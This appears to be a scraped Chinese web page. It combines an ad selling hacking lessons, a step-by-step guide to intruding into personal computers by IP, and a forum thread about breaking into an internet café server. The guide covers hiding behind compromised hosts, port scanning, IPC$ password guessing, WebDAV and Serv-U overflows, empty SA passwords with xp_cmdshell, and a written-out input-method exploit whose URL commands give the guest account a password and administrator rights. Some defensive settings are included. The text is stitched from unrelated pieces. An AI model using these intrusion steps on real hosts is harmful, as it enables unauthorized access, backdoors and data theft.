个人主机入侵网络攻击 知道对方IP该怎么入侵
? 个人主机入侵网络攻击 知道对方IP该怎么入侵
最新教学,有人问技术有展示吗?我怎么知道你是不是骗我的呢?既然知道我是骗你的,为什么还要学习呢?为什么非要我说一句:是真的,不骗你。你们才肯相信呢?不相信可以不和我联系,或者直接拉黑我,不要和我废话,多说也无益,为什么还要和我说呢?教学可以公开一些,无所谓,最重要是你们真学,想学,肯学,那才重要!不付出那怎么有回报呢,难道天下的饭店我们都可以随便吃喝吗?
个人主机入侵网络攻击的步骤
第一步:隐藏自已的位置
为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽 量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指,HACK实现通过后门程序控制 的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是 “肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机
攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地 址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地 找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统 类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,以试 图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以 及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机
攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进 行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻 觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的 一种技法。
第四步:获得控制权
攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事 :清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程 操纵程序,以便日后可以不被觉察地再次进入系统。此外,为了避免目标主机发现,清除日 志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权
攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;窃取帐号密码、 个人资料等。
三、网络攻击的原理和手法
1、从扫描开始
扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。 常见的扫描工具有X-scan、superscan、流光、X-port等。
在这些工具中,国产的X-scan与流光可算的上是两个“利器”,这两个工具不但具有相当快 的扫描速度和精确度(个人感觉X-scan在扫描速度上可能更快一点),同时还是发起攻击的 第一手选择,当然在攻击方面,流光更为强悍些。
除了常见个WWW(80)、FTP(21)、TELNET(23)等,查查十大高风险事件,我们就知道, 攻击者通常还对下列端口很感兴趣:
135:MS RPC,可以产生针对Windows 2000/XP RPC服务远程拒绝服务攻击,以及RPC溢出漏 洞,著名的“冲击波”“震荡波”就是利用DCOM RPC感染设备;
137~139:NetBIOS,WINDOWS系统通过这个端口提供文件和打印共享;
445:Microsoft-ds,非常重要的端口,LSASS漏洞、RPC定位漏洞都在这里出现;
1433:Microsoft SQL,后面会提到,SQL SERVER默认***时留下的空口令SA用户可以让攻 击者为所欲为;
5632:PCANYWERE,一种远程终端控制软件;
3389:WINDOWS远程终端服务
4899:RADMIN,一种远程终端控制软件
由此可见,没有扫描,自然也就没有攻击,从安全的角度的来说,个人主机最安全的系统应 该算是WINDOWS98,由于
WINDOWS98几乎不开启任何服务,自然也没有任何开放端口,没有端 口,对于这类系统攻击的可能性就大大降低。当然,XP在打了SP2的补丁后,等于有了一个 基于状态的个人防火墙,相对安全性也提高了很多。
2、攻击开始
扫描到有开放的端口,下一步自然是针对相关端口发起攻击,针对不同端口常见攻击方式有 :
139/445:“永恒”的IPC$(未发现此漏洞)
说是“永恒”,主要是因为这种漏洞基本已经只能存在于记忆中了。
什么是IPC,IPC是共享“命名管道”的资源,主要用于程序间的通讯。在远程管理计算机和 查看计算机的共享资源时使用。什么是“空连接”,利用默认的IPC我们可以与目标主机建 立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的 用户列表。
得到用户列表有什么用?我们可以利用IPC,访问共享资源,导出用户列表,并使用一些字 典工具,进行密码探测。得到了用户权限后,我们可以利用IPC共享访问用户的资源。但所 谓的ipc漏洞ipc漏洞,其实并不是真正意义上的漏洞,WINDOWS设计初衷是为了方便管理员 的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c,d,e ……)和系统目录winnt或windows(admin)。所有的这些,初衷都是为了方便管理员的管理, 但好的初衷并不一定有好的收效,曾经在一段时间,IPC$已经成为了一种最流行的入侵方式 。
IPC$需要在NT/2000/XP下运行,通常如果扫描出目标开放了139或445端口,往往是目标开启 IPC$的前兆,但如果目的主机关闭了IPC $连接共享,你依然无法建立连接,同样如果管理 员设置禁止导出用户列表,你就算建立IPC$连接也无法看到对方的用户列表。另外提醒一下 ,WINXP系统中,已经禁止了远程用户的访问权限,因此,如果对方是XP的操作系统,就别 费这个劲了。
如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把
RestrictAnonymous =
DWORD的键值改为:(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现 问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把
AutoShareServer(DWORD)的键值改为:。
pro版:找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareWks(DWORD)的键值改为:。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4***防火墙(选中相关设置),或者端口过滤(滤掉139,445等)
5设置复杂密码,防止通过ipc$穷举密码
除了IPC$,我们还可以利用例如SMBCRACK通过暴力猜解管理员口令,如果对方未打补丁,我 们还可以利用各种RPC漏洞(就是冲击波、震荡波用的那些漏洞),通过各种溢出程序, 来得到权限提升(原理和病毒感染的原理是一样的)。
21:Serv-u入侵(未测试使用)
Serv-u是常用的FTP SERVER端软件的一种,因为常用,所以被研究出的漏洞也不少,如果对 端开放了21端口,并且采用Seru-U来架站的话,可以查看一下对端的版本。对5. 004及以下 系统,可用溢出入侵。(serv5004.exe)对5.1.0.0及以下系统,有一个本地提升权限的漏 洞。(servlocal.exe)
Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户 的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP
Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、 本地系统上以FTP系统管理员权限来执行任意命令。
80:曾经的神话“WEBD***”(使用情况,成功溢出4台主机,并登陆其中一台,其他3台的 IIS重启)
微软的IIS功能强大,但遗憾的是同样漏洞多多,如果IIS不打补丁到SP3的话,那么就有一 个著名的WEBD***漏洞。
Webdav漏洞说明:
Microsoft Windows 2000 支持“万维网分布式创作和版本控制 (WebD***)”协议。RFC 2518
中定义的 WebD*** 是超文本传输协议 (HTTP) 的一组扩展,为 Internet 上计算aIIS 服务 (默认情况下在 LocalSystem 上下文中运行)的安全上下文中运行。 尽管 Microsoft 已 为此弱点提供了修补程序并建议客户立即***该修补程序,但还是提供了其他的工具和预防 措施,客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利 用。
可以使用扫描器:Webdavscan(是一个专门用于检测IIS 5.0 服务器是否提供了对WebD***的 支持的扫描器)来查找网络中存在WEBD***漏洞的主机,并用溢出程序:wdx.exe来进行攻击 当溢出成功后,就可以使用telnet或者是nc等连接到目标主机的7788端口。
如:telnet 127.0.0.1 7788
如果正常的话,将出现以下提示:
Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有
C:\WINNT\system32&
如何防御:
1. 搜索注册表中的如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
增加如下注册表键值:
value name: DisableWebD***
Data type: DWORD
value data: 1
2. 使用MS提供的专用补丁!
1433:Microsoft SQL的SA空口令(扫描到4台,成功登陆其中3台)
微软的MSSQL7.0以下的版本在默认***时其SA(System Administrator)口令为空,所开端口 为1433,这个漏洞很早了,但直到现在我们依然可以扫描到很多空口令的SA。更为“搞笑” 的是,微软为了能够让SQL管理员管理方便,还设计了一个xp_cmdshell来执行各种相关命令 。一个入侵者只需要使用一个MS SQL客户端与SA口令为空的服务器连接就可以获得System的 权限,并可以在目标主机上执行任意命令。
攻击方式,利用“流光”或其他扫描工具可以扫描、破解SA口令,破解成功后可以使用SQL 客户端(如SQLEXEC)连接,并获得系统权限。
解决办法:
更改SA管理用户口令;
删除XP_CMDSHELL命令。(但并不保险,因为如果拥有SA权限,还是可能恢复该命令的)
输入法漏洞(不太可能存在了,但可以猜解管理员用户口令)
Microsoft Windows 2000 Server及以上版本在***服务器时,其中有一项是超级终端服务 ,该服务可以使用户通过图形界面象管理本地计算机一样控制远程计算机(因此成为众多攻 击者的最爱)。该服务所开放的端口号为3389,是微软为了方便用户远程管理而设。但是中 文Windows 2000存在有输入漏洞,其漏洞就是用户在登录Windows 2000时,利用输入法的帮 助文件可以获得Administrators组权限。
1、用终端客户端程序进行连接;
2、按ctrl shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰, 就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
3、在\&选项\&菜单上点右键---&跳转到URL\&,输入:c:\\winnt\\system32\\cmd.exe.( 如果不能确定NT系统目录,则输入:c:\\ 或d:\\ ……进行查找确定);
4、选择\&保存到磁盘\& 选择目录:c:\\inetpub\\s\\,因实际上是对方服务器上文件自身 的复制操作,所以这个过程很快就会完成;
5、打开IE,输入:http://ip/s/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就 完成了第一步;
6、http://ip/s/cmd.exe?/c echo net user guest /active:yes&go.bat
7、http://ip/s/cmd.exe?/c echo net user guest elise&&go.bat
8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add
guest&&go.bat
9、http://ip/s/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
10、在\&选项\&菜单上点右键---&跳转到URL\&,输入:c:\\inetpub\\s\\go.bat ---&在磁 盘当前位置执行;
11、OK,.这样我们就激活了服务器的geust帐户,密码为:elise,超级用户!
注意事项:
当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但 如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映 象,你的ip及机器名,并能发消息给你!
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动 telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧 :-)
这个漏洞在WIN2000 SP1中已经修改,因此,实际网络中存在此漏洞的机器几乎没有,但是 ,据说紫光2.3版本、超级五笔的输入法中又发现此漏洞。
1.打补丁;
2.删掉相关输入法,用标准就可以;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32
[url=file://\\termsrv.exe]\\termsrv.exe[/url];
如果对方已经修改了输入法漏洞,那么只能通过猜解目标管理员口令的方法来尝试远程登陆 。
:PCANYWERE和RADMIN
这是两种远程控制软件,使用方式与远程终端访问类似,都支持图形化界面对远程计算机进 行管理,设计的初衷是为了让管理员能够更方便的管理设备,但这些软件,特别是RADMIN, 可以设置其在***时,不出现任何提示,这种方式使RADMIN更多的被做为一种木马使用。攻 击者会注意扫描这些端口,因为一旦破解了相应口令就可以象操作本地计算机一样控制目标 。
23:猜解ADSL MODEM口令
很多时候,扫描只能得到一个23端口,不要沮丧,因为对于个人主机而言,这往往是因为目 标主机采用了一个ADSL MODEM上网。一般用户在使用ADSL MODEM时,往往未加设置,这时, 攻击者往往可以利用ADSL MODEM的默认口令,登陆ADSL,一旦登陆成功,就有可能窃取ADSL 帐户和口令,并可以查看到内网的IP地址设置,并通过配置NAT映射将内
联系***:cand57黑客技术之知道对方IP入侵别人电脑黑客_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
黑客技术之知道对方IP入侵别人电脑黑客
上传于||文档简介
&&天若有情天亦老,人学物理数学金融生物死得早
你可能喜欢(豆幻梅Vivi-theO)
(深圳青年)
第三方登录:查看:12783|回复:9
我知道网吧服务器内网的IP和MAC地址,如何强行进入并提高自己的权限...
一见如故,再见陌路
这里不做这样的解答~
如果我们的大脑简单到可以被理解,我们就会愚蠢到无法理解它!
光这些不行把。你多学点有用比较好
助理工程师
:L :L :L 学下攻防技术好么?
为什么不行呢?
........哭啊
中级工程师
这事放在10年前是可以的,现在想也别想了,如果谁还能找到这样的系漏洞,人家是一定不会告诉你。
提示: 作者被禁止或删除 内容自动屏蔽
:lol 正常反应,呵呵